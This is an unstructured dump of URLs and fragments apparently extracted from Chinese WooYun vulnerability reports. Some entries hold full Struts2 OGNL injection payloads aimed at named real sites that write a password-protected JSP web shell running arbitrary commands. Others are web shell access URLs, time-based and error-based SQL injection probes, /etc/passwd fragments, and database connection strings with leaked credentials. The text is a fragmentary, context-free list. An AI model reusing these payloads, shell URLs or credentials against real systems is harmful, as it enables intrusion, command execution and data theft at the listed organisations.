http://**.**.**/_ http://**.**.**/script_ root:/roo***** on:/usr/s***** bin:/***** dev:/***** nc:/bin:/***** roxy:/bi***** w-data:/va***** up:/var/ba***** Manager:/***** http://**.**.**/ http://**.**.**/modroom.aspxid=33757 http://broker2.esf.leju.com/login/网站存在注入,详情见漏洞证明。 http://cdd.yun.pingan.com:8080/NewChannel/target/info com:8080 http://cdd.yun.pingan.com:8080 https://zxyh.nbcb.com.cn/desktop/LimitQry.do http://**.**.**.** http://channel.yy.com http://channel.yy.com/auth/login.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E pom.xml/*view*/_ root:/roo***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** 
wn:/sbin:/s***** sbin:/***** tor:/root:/***** ftp:/s***** http:/***** http://w.littleswan.com/weixin/serviceDetail.html?serviceId=555 http://w.littleswan.com/midea-weixin/serviceHelper/getDetailServiceInfo?serviceId=555 http://**.**.**.**/Login.aspx http://chexian.sinosig.com http://chexian.sinosig.com/NetCar/carCustomService_forwardClaimProgressSearch.action?selectedModuleId=claimProgress http://parter.xiaoao.com http://b2g.csair.com/login.action http://vote.sports.163.com/vote2/showVote.do?voteId=50589 http://vote.ent.163.com/vote2/showVote.do?voteId=4846 http://vote.news.163.com/vote2/showVote.do?voteId=43095 http://vote.game.163.com/vote2/showVote.do?voteId=28727 http://vote.lady.163.com/vote2/showGroup.do?vgId=1885 http://**.**.**.**/mall/ui/giftIndex.action http://shop.ehuatai.com/test.jsp?pwd=024&l=ls http://emall.qlbchina.com/mall/ui/giftIndex.action http://creditcard.gzcb.com.cn/mall/ui/giftIndex.action http://mall.hkbea.com.cn/mall/ui/giftIndex.action http://ccmall.bsb.com.cn/mall/ui/giftIndex.action http://www.tamax.jp/tamax/newhouse/search.action http://mall.nbcb.com.cn/mall/ui/giftIndex.action http://shop.fudian-bank.com/mall/ui/giftIndex.action http://1.202.165.69:7007/clqprt/LoginAction.action https://***.csair.com/***.action http://202.108.103.169/htweixin/InsuranceDownload.action http://sfocs-i.sf-express.com/SFweb/handler.action http://**.**.**/Account/LogOnReturnUrl=%2f_ http://**.**.**/ecardaccount/registersoftname=yunweb&version=**.**.**.**5_ http://103.15.200.54:9200/_plugin/head/ http://119.188.128.54:9200/_plugin/head/ http://103.15.200.81:50070/dfshealth.jsp http://gmtmc.95080.com/ https://soc.cs-air.com/opws-web/security-Remember-gotoLogin.action http://103.15.201.147:8001/faban/gotoLogin.action http://dream.300.cn/?id=734 http://**.**.**/_ http://**.**.**/job/site/ws/aboutus.html_ http://**.**.**/s__biz=MzA4MDI4OTUwNw==&mid=200366208&idx=2&sn=3da4406db9f089b8f0703187e39e8cc7&devicetype=webwx_ http://**.**.**/loginfrom=%2F_ 
http://**.**.**/script_ http://61.152.171.123:8888/hereditary_sharing/welcome/welcome.action http://www.tangscan.com https://rap.weibo.cn/account/mySetting.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E https://**.**.**.**/checkUidAvailable.action http://**.**.**.**/bugs/wooyun-2016-0170697 
http://**.**.**.**:8091/logout.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%**.**.**.**.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%**.**.**.**.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E http://202.198.176.89/SecCenter/index.jsp http://**.**.**.**/bugs/wooyun-2010-0181276 http://yfgl.chinazxt.com http://yfgl.chinazxt.com/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000 http://yfgl.chinazxt.com/repository/000000000/mytest.jsp http://**.**.**.** 
http://rap.taobao.org/account/all.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get%28%23parameters.rpsobj[0]%29,%23w.getWriter%28%29.println%2888888888-1%29,%23w.getWriter%28%29.flush%28%29,%23w.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse http://124.127.96.231:7001/indexlis.jsp url:test.baihe.com http://test.baihe.com/ jdbc:mysql**.**.**.**:3306/jttxl?useUnicode=true&characterEncoding=UTF-8 http://support.huawei.com/myspace/mySmartCare.action http://support-trial.huawei.com/carrier/pageNotFound.action http://ent.ws.netease.com/admin/login.do http://soa.dongputech.com:7010/ one:10m http://wsq.discuz.qq.com/?c=index&a=viewthread&f=wx&tid=1&siteid=111111111 https://www.oshadan.com/main,关键字:Haier http://124.152.236.162 http://tzb.dept.ccut.edu.cn/ http://42.96.131.200:8081/index.html http://mobile.zhushou.sogou.com/android/recommend_category_detail.html?iv=25&id=76&start=0&limit=25&uid=ed83a60cea765d52e3c2ced557270c62&vn=5.0.5&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_21874_2&sc=0 http://video.grandcloud.cn/index.php?m=member&c=index&a=login https://36.110.135.63/ http://smsp.epicc.com.cn/WXWeb/$guangd/picchtml5/view/casualtyInsuranceDotAction.action http://mail.hundsun.com/ luyf:windows@1 https://synergy.hundsun.com/ https://synergy.hundsun.com/weaver/weaver.file.FileDownload?fileid=426840&coworkid=0&requestid=0&desrequestid=0 https://home.hundsun.com/other/guide/Hundsun_guide.pdf https://vpn.www.hundsun.com/ https://sslvpn.www.hundsun.com https://192.168.60.49/options.cgi http://192.168.61.35/Citrix/XenApp/clientDetection/downloadNative.aspx http://wan.40407.com http://wooyun.org/bugs/wooyun-2016-0177871 http://211.150.64.68/ http://183.131.12.139:81/phpmyadmin/ http://106.2.32.66:8080/webdav/ 
http://www.pyyx.com/admin/impression/comment?all=1&p=8 http://www.pyyx.com/admin/impression/comment?all=1&p=8 http://redmine.pyyx.com http://www.pyyx.com/admin http://live.k.sohu.com/api/function/getChannelPackageUrl.go?channelId=1003 http://ebidding.sinopec.com:8880/TPWeb4AAA/Showinfo/SearchResult.aspx?keyword="查询内容"&searchtype=title http://**.**.**.**/ http://**.**.**.**/pay/alipay2/ http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 http://**.**.**.**/pay/alipay2/ http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 http://**.**.**.** http://124.207.206.223:8080/synthquery/ http://124.207.206.223:8080/zecmd/zecmd.jsp?comment=whoami jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:dev3 jdbc:oracle:thin:@**.**.**.**:1521:dev3 jdbc:oracle:thin:@**.**.**.**:1522:gywsdj jdbc:oracle:thin:@**.**.**.**:1521:ora9i jdbc:oracle:thin:@**.**.**.**:1522:orcl10g jdbc:oracle:thin:@**.**.**.**:1521:test141 jdbc:oracle:thin:@**.**.**.**:1521:oracle9i jdbc:sqlserver**.**.**.**:2010;DatabaseName=SXQXT jdbc:sqlserver**.**.**.**:1433;DatabaseName=OpenMas www.sf-ecs.com http://mer.lakala.com:28280/使用的是jboss。而且jmx-console还存在,于是拿出tangscan的某插件,测试发现居然是存在的 http://lib.wap.zol.com.cn/ask/app/addReplyGood.php http://lib.wap.zol.com.cn jdbc:oracle:thin:@localhost:1521:orcl http://fe.social-touch.com:30082/account/all.action的第一感觉就是struts2。拿出了tangscan插件测试 http://api.51xingke.com/index/getshoplist?city=1&cls=0&count=0&distance=0&f=2&ismore=0&key=%E6%9C%A8&lat=22.539498&lng=113.944141&type=0&v=5 http://api.51xingke.com/index/getshoplist?distance=0&lat=22.539498&lng=113.944141&cls=0&type=0&count=0&ismore=0&city=1&key=%E6%9C%A8&v=5&f=2 http://**.**.**.**/family/home-short.action||yes http://**.**.**.**/activity/star-service.action http://srm.rapoo.cn:8090 http://**.**.**/%28S%282m0o13alnrk4z2zocut0bdq1%29%29/PDFFiles/Certificate/14740/ce134cfd-a3d6-489c-8b28-f6b41d827318.aspx http://tvpic.wasu.cn/enterRegedit.action 
http://qns.geely.com/QNS/auth/auth/login.action http://60.191.59.19:9090/看这个界面就惊呆了,好吧,其实就是个开发测试环境 http://**.**.**.**:80/ http://**.**.**.**:888 http://**.**.**.**:888/gdr.jsp jdbc:oracle:thin:sas/34cusd3sas5@**.**.**.**:1521/sasdb http://dongguan.l99.com http://**.**.**.**/s/1kVdErzT F7:07:08:BE F7:07:08:5E F7:07:48:6C F7:07:0A:4E F7:07:0B:16 F7:07:0E:8A F7:07:0D:AA F7:07:09:44 F7:07:0E:84 F7:07:0C:8E F7:07:0C:06 F7:07:0F:0C F7:07:0D:F0 F7:07:0F:08 F7:07:0D:5C F7:07:0D:52 F7:07:07:7E F7:07:0E:F6 F7:07:0F:16 F7:07:34:E0 F7:07:33:48 F7:07:49:EC F7:07:48:F4 F7:07:09:E4 F7:07:4D:2C F7:07:4D:60 F7:07:4C:24 F7:07:4C:74 F7:07:48:B0 F7:07:4B:10 F7:07:49:08 F7:07:4E:04 F7:07:4D:9C F7:07:4D:84 F7:07:46:EC F7:07:31:C4 F7:07:31:BC F7:07:33:04 F7:07:31:9C F7:07:31:D8 F7:07:33:10 F7:07:32:28 F7:07:31:48 F7:07:32:98 F7:07:31:6C F7:07:31:FC F7:07:32:18 F7:07:32:A0 F7:07:32:1C F7:07:30:FC F7:07:32:10 F7:07:30:DC F7:07:30:80 F7:07:32:00 F7:07:32:8C F7:07:32:94 F7:07:32:BC F7:07:32:C4 F7:07:31:78 F7:07:32:38 F7:07:32:D8 F7:07:31:C0 F7:07:32:30 F7:07:33:30 F7:07:31:24 F7:07:41:90 F7:07:39:D8 F7:07:36:4C F7:07:40:7C F7:07:3A:B4 F7:07:3A:F0 F7:07:3D:68 F7:07:3C:10 F7:07:41:C0 F7:07:3B:DC F7:07:43:24 F7:07:35:58 F7:07:3E:A4 F7:07:42:BC F7:07:44:34 F7:07:46:50 F7:07:3C:0C F7:07:3F:F4 F7:07:40:00 http://dx.synu.edu.cn/ArticleType.asp?boardname=&classid=1 http://211.150.77.81 http://wiki.wooyun.org/pentest:filepath http://**.**.**.**/ http://m.hbhk.com.cn:81/new_wap/index.html http://jwc.synu.edu.cn/website/newstemplate/newsallcontent.jsp?newsId=160428111751 http://m.abab.com/index.php?a=Search&keyWord=会说话的狗狗本 http://211.150.64.118/zabbix/ http://120.27.165.232/cmp/login.htm http://passport.house365.com/?city=nj&app=default&act=login主站登陆的地方有验证码 http://android.myapp.com/myapp/detail.htm?apkName=com.example.jindou http://60.211.217.162:9001/fqApi/api/stuUser/getStuUser.do http://www.kumayi.com:80/ www.kumayi.com http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh= 
http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh=-1 http://**.**.**.**/news/newslist.php?categoryId=15 http://58.68.130.68/wis18/customerjsp/msyh/login/login.jsp http://219.135.189.180:8081/services/MobileService http://219.135.189.182:8081/services/MobileService http://wooyun.org/bugs/wooyun-2016-0169453 http://60.211.217.162:9001/opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/userIcon/117743/header.jsp http://60.211.217.162:9001/fqApi/api/stuUser/headerPicUpload.do http://mail.tianan-life.com/ http://wx.sohu-inc.com http://wx.sohu-inc.com/index.jsp http://qks.hnist.cn/xb/digest?paperID=228 http://61.187.92.238:8610/printpage.asp?ArticleID=565 http://61.187.92.238:8610/Admin_Login.asp http://www.8dov.cn:8086 http://t.abic.cn:9085/GalaxyEarth/ http://map.ab95569.cn/ http://**.**.**.**/?p=1548),而且还是system权限。 http://115.182.85.139/secure/ http://10.219.18.63/ http://forum.internal.sina.com.cn/idc/main/list.asp http://papa.me/studio/login/mobile接口登陆的地方没有登陆限制 http://cwc.synu.edu.cn/website/secondPages/secondIndex.jsp?i=0&ItemIdType=null&parentItemId=77 http://www.cau-edu.com/ http://www.cau-edu.com/phpMyAdmin/ http://**.**.**.**/ http://**.**.**.**/api/shell.php http://form.pkusz.edu.cn/oqss/user/ForgetPSW.aspx http://project.youku.com/minisite/admin/index.php http://project.youku.com/minisite/admin/module_info.php?mid=2 http://60.175.6.68/ http://www.airpp.com/frontTicketHelpAction!aboutus.action http://sys.airpp.com http://sys.airpp.com/ http://www.ntcu.edu.tw/sa/news5/view.asp?ID=8376 http://ms3.ntcu.edu.tw/sa/link/htm/news/view.asp?ID=1804 http://**.**.**.**/WeChatService/OrderDetails.htm?Id=75324 http://manager.healthmall.tv:8088/SyatemManagement/NewLogin.aspx tv:8088 https://**.**.**.**/ http://111.13.87.178/ http://111.13.87.178/christian/mysqlapi/repository/archive.zip?ref=master http://111.13.87.178/root/dpadmint.grid.sina.com.cn/repository/archive.zip?ref=master http://111.13.87.178/jingbo8/redis_auto/repository/archive.zip?ref=master 
http://111.13.87.178/root/idb.cluster.sina.com.cn/repository/archive.zip?ref=master er.sina.com.cn/auto***** ina.com/add_a***** http://school.61learn.com/delete_cart_goods.php http://shop.61learn.com/delete_cart_goods.php http://smtp.jingzhengu.com:8080/Login/EPLogin.html http://acm.hpu.edu.cn/swzl/findAllLose?key=-1 http://cms.jingzhengu.com/admin/login.aspx http://info.hnist.cn//getPassword.jsp?btn1=%bb%f1%c8%a1%c3%dc%c2%eb&birthday1=%c8%e7%a3%ba19880812&birthday3=%c8%e7%a3%ba19880812&id=-1 http://em.xidian.edu.cn/course/yc/admin/primarypage.asp http://hlqk.feiliu.com/countc/downcount/?type=1&resource=fl http://rose.feiliu.com/newsc/news_list/?&start=8 https://59.61.80.154:10443/sslvpn/portal.html http://zone.wooyun.org/content/22529 http://zone.wooyun.org/content/21962 http://bbs.3737.com/faq.php http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20an$d%201=1 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20an$d%201=111 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20ord%er%20b%y%2010 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20ord%er%20b%y%2011 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35%20and%201=1 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35%20an%d%201=1 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35%20an%d%201=11 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35 http://**.**.**.**/message.do http://223.203.210.213/plugins/weathermap/configs/wooyun.php http://www.mengniuir.com/c/ir_presentation.php?year=2007 http://xw.em.swjtu.edu.cn/Epaper/Default.aspx?CurEID=1&CurFC= http://www.aokang.cn/member/login.aspx http://ebooking.lvmama.com/ http://www.lvmama.com/favicon.ico http://pic.lvmama.com/js/new_v/jquery-1.7.2.min.js http://pic.lvmama.com/min/index.php?f=/styles/v4/modules/calendar.css 
http://pic.lvmama.com/min/index.php?f=/styles/v5/base.css,/styles/v5/common.css http://pic.lvmama.com/min/index.php?f=/styles/v5/modules/dialog.css,/styles/v5/modules/table.css,/styles/v5/modules/arrow.css,/styles/v5/modules/form.css,/styles/v5/modules/button.css,/styles/v5/modules/paging.css,/styles/v5/modules/tip.css http://pic.lvmama.com/styles/v5/ebk.css http://pic.lvmama.com/js/common/losc.js http://pic.lvmama.com/js/common/losc.js http://pcp.povos.com.cn/ http://pcp.povos.com.cn/news_detail.jsp?id=10410 http://oa.okair.net/seeyon/index.jsp https://111.160.87.131/por/login_psw.csp http://172.16.3.110/login.action http://lcx.cc/?i=3838 http://166.111.9.20:802/View/Login.aspx http://166.111.9.20:803/View/Login.aspx http://166.111.9.22:802/View/Login.aspx http://166.111.9.22:803/View/Login.aspx http://166.111.9.22:8088/View/Login.aspx http://vcarmove.vcyber.com:9020 http://oa.21tb.com/ http://m.api.qmango.com/hotels.asmx/getHotelsJson_Mango http://**.**.**.**/bugs/wooyun-2010-0112629 encap:Ethernet CD:72:93 fecd:7293/64 Scope:Link MTU:1500 packets:233491010 packets:228417700 txqueuelen:1000 http://pms.bxjr.com/redmine/projects http://pms.bxjr.com/redmine/projects/app-iphone/wiki http://gz.zhujia360.com/article/list/cate_id/42* http://fenxiao.zhujia360.com/crm.php?r=login http://fenxiao.zhujia360.com http://act.vg.ztgame.com/live/public/newsinfo/36 http://222.92.3.77/ http://www.yupoo.com/account/login/ http://beijing.vanke.com/ http://e-station.cimc.com/Login.aspx?RequestUrl=http%3a%2f%2fe-station.cimc.com%3a8083%2fDefault.aspx http://ueditor.baidu.com/website/onlinedemo.html http://game.m.sohu.com http://www.u193.com/top.php?gid=306 http://e.dangdang.com/media/api.go?action=specialtopichistory&channelId=1&channelType=html5*&channelType=ALL&clientVersionNo=5.0.0&deviceSerialNo=html5 http://www.baimei100.com/ http://123.57.233.181:28017/log.txt http://www.cclinux.com/index/opensoft.asp?soft_id=18&url=2 
http://www.minanins.com/maechannel/manage/info/listNewsAjaxCallFront.do http://job.shmtu.edu.cn/qiyezhmm.asp?type=2 http://123.127.110.171:8001/sireports/login.do?method=indexpage encap:Ethernet AE:8B:26:EA:4A addr:192.168.10.165 Bcast:192.168.10.255 Mask:255.255.255.0 fe26:ea4a/64 Scope:Link MTU:1500 packets:252442835 packets:211675215 txqueuelen:1000 http://soft.ksbao.com/search.aspx?key=1&showOne=1 http://soft.ksbao.com/search.aspx?key=1%27;WAITFOR%20DELAY%20%270:0:5%27--&showOne=1 http://mba.cau.edu.cn http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump¶ms={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump¶ms={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump¶ms={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a http://**.**.**/ http://**.**.**/bugs/wooyun-2010-052615 http://**.**.**/bugs/wooyun-2010-0128938 http://114.80.121.110:8990/login.do http://120.52.145.59:8080/admin/login.html http://120.52.145.59:8080/governance/services/com.pingan.pafa.fling.monitor.FlingMonitorDubboServices/owners http://eservice.hxlife.com/Policy/policyContent.do?policyNo=2015137350421088 http://eservice.hxlife.com/Policy/passiveQuery.do?policyNo=2015137350521088 http://eservice.hxlife.com/Policy/policyContent.do?policyNo=2015137350621088 http://eservice.hxlife.com/Policy/appntQuery.do?policyNo=2015137350622088 http://eservice.hxlife.com/Policy/shouyimanQuery.do?policyNo=2015137350623088 http://eservice.hxlife.com/Policy/passiveQuery.do?policyNo=2015137350624088 http://eservice.hxlife.com/Policy/passiveQuery.do?policyNo=2015137350624+1逻辑查询上万用户订单088 https://m.ehuobang.com/app/ajax/user.php?action=logintel http://m.ehuobang.com http://**.**.**/download/ mobds.ganji.cn/datashare/ http://b2e.ceair.com/DeptDefault.aspx http://219.133.73.185:81/admin/login.do 
http://travel.sina.com.hk/swf/photoslide.swf?x=/api/photoslide/weibo/local/sidebar/1.xml?1461050406000 http://**.**.**.**/softac/login.jsp https://**.**.**.**/beetle-jp/indexAction.action http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:tcmpdb http://crm.kongzhong.com/subscribe.php http://98.126.98.35/radius/ http://www.imxvpn.com/ http://open.qyer.com/qyer/company/default_list?citys_str=52&client_id=qyer_ios&client_secret=cd254439208ab658ddf9&count=1&lat=1&lon=1&oauth_token=ab&page=1&track_app_channel=App%2520Store&track_app_version=6.8.5&track_device_info=iPhone8%2C1&track_deviceid=564443CC-9189-42C1-9CC9-0922116AD5C4&track_os=ios%25209.3.1&track_user_id=7851234&v=1 http://**.**.**.**:3000/web/initAction.action http://ums.iboxpay.com/mcht-self/ www.mojing.cn http://www.mojing.cn http://blog.zenzet.com:8010/wordpress/ encap:Ethernet addr:192.168.10.161 Bcast:192.168.10.255 Mask:255.255.255.0 fe02:1a20/64 Scope:Link MTU:1500 packets:285900085 dropped:137967 packets:268148077 txqueuelen:1000 http://le.yanbao.org http://wx.guodu.com/ http://211.144.149.2/mic/admin/check.action webpath:C:\Program whoami:2003server\administrator jdbc:oracle:thin:@192.168.7.130:1521 http://**.**.**.**/index.action http://azss2resource.game.mojing.cn/?keywords=1&page=1 http://219.133.36.173:89/phpmyadmin/ ip:119.254.93.70 http://119.254.93.70:8002/zc19/1.jsp http://119.254.93.71:8002/qtfr/login/login.jsp的 http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://open.mojing.cn/developer/feedback/submit http://weixin.mojing.cn/index.php?s=/Home/User/login/from/1.html http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC&callback=jQuery172013711762335151434_1461556777871 http://mj.cms.mojing.cn/api/v1/vr_market/source_list.php?source_type=2&category_id={catid}&version=20151016 http://webmail.jsbchina.cn/webmail/login/login.do http://bsms.ccut.edu.cn/ 
http://social.all-wifi.cn/index.php/login/login http://ad.all-wifi.cn/index.php/index/index.html http://pastebin.com/aE4sKnCg http://**.**.**.** jdbc:oracle:thin:@**.**.**.**:1521:testorcl user:exam2 password:exam2 http://accesslicense.hd.sohu.com:8888/device?_method=post®ister=True&smsDeviceId=27 http://59.40.77.37:7001/tcmp/bizframe/jsp/login.jsp http://fota.yitiji.mojing.cn/admin/ http://fota.yitiji.mojing.cn/admin/upgrade/editup?id=24&versionid=16 http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368&SourceID=576&Sign=C92A3457E748E4813A7B3AAD294595FA http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368%27%20AND%203750=CONVERT%28INT,user%29%20--%20%20-&SourceID=576&Sign=C92A3457E748E4813A7B3AAD294595FA https://www.helpnetsecurity.com/2016/05/04/imagemagick-zero-day-flaw/ report:Array http://**.**.**.**/ http://120.197.93.208:8085/loginAction!login.e http://st.renren.com/create http://shitu.baidu.com/ http://shitu.baidu.com/n/searchpc?queryImageUrl=http%3A%2F%2F115browser.com%2Fexp1.png http://mail.9air.com/ http://sms.9air.com/oa!aircrewLogin?username=DingJun&airuser.aircrewName=丁军&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A http://sms.9air.com/oa!aircrewLogin?username=sms&airuser.aircrewName=SMS&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A http://sms.9air.com/oa!aircrewLogin?username=gaoweixing&airuser.aircrewName=高卫星&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A http://crew.9air.com/personal_change_password.jsp http://crew.9air.com/personal_change_password.jsp http://www.openwall.com/lists/oss-security/2016/05/03/18 http://www.lizi.com/user/resetPwd https://hackerone.com/reports/115857 https://habrahabr.ru/company/mailru/blog/274855/ http://tuan.airchina.com/booking/payForGroupTicket.htm?oid=760004 https://hackerone.com/reports/115857 
https://habrahabr.ru/company/mailru/blog/274855/ http://i.youku.com/u/setting/base_avatar.html http://**.**.**.**/Report//userlogin.action存在命令执行漏洞 https://passport.mafengwo.cn/setting/avatar/ http://www.multigold.com.cn/forgetPassword.html www.multigold.com.cn http://www.multigold.com.cn http://www.airshop.com.cn/ http://www.airshop.com.cn/ffpclub/kingpeng_list.php http://www.airshop.com.cn/ffpclub/kingpeng_list.php?keyword=if%28now%28%29%3dsysdate%28%29%2csleep%280%29%2c0%29/*%27XOR%28if%28now%28%29%3dsysdate%28%29%2csleep%280%29%2c0%29%29OR%27%22XOR%28if%28now%28%29%3dsysdate%28%29%2csleep%280%29%2c0%29%29OR%22*/ https://m.mafengwo.cn/nb/public/xauth_change_user.php https://wx2.qq.com/ http://www.kaixin001.com http://www.kaixin001.com/home/ http://www.kaixin001.com/photo/act_view_42.html https://github.com/upcgaolei/meshop/blob/5884178a19b966ddffe1368bb183aff7b177be79/_book/%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%BF%A1%E6%81%AF.md https://ssl.corp.gome.com.cn https://10.128.14.233 http://lvyou.elong.com/home/pictorial.html?do=add http://blog.ifeng.com/ http://www.ganji.com/pub/pub.php?act=pub&method=load&cid=7&mcid=23&domain=cd&_pdt=fang http://bbs.sina.com.cn/ http://quanzi.zbj.com/main/view-qid-10470.html jdbc:mysql:// www.mlairport.com www.mlairport.com http://**.**.**.**/jsoa/login.jsp http://zhaopin.kaixin001.com/yingcai/personal.php?jid=113&come_from=3&isupdate= http://i.liebao.cn/index.html http://bbs.qiku.com http://114.215.138.214/ https://hackerone.com/reports/115857 